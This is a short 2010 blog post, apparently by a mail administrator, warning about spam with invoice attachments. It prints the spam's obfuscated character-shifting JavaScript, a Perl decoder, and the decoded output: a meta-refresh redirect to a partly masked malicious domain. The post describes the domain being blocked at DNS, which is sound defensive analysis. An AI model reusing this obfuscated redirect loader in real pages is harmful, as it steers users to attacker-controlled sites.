Tuesday, September 21, 2010

Don't open any unfamiliar attachments today!

The mail servers here started getting inundated with some weaponized email spam about invoice attachments.

The decoded contents of this spam contains the following javascript:

 

var s="ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo";

m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){  m+= '&';} else if (s.charCodeAt(i) == 23) {  m+= '!';} else {  m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m);

 

When I reverse engineered it in perl it produces the following result:

 

#!/usr/bin/perl 

my $s = 'ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo';

push @new, chr( ord( $_ ) - 1 ) for split( //, $s );

print join( '', @new ) . "\n";

 

OUTPUT:

 

hello brian <meta http-equiv="refresh" content="0;url=http://XXXXturksagliksenXXXX.org.tr/x.html" /> bye brian

 

I rigged up our name servers so that when one of our customers tries to hit that domain, it just redirects to a web page indicating that it was blocked.

No comments:

Post a Comment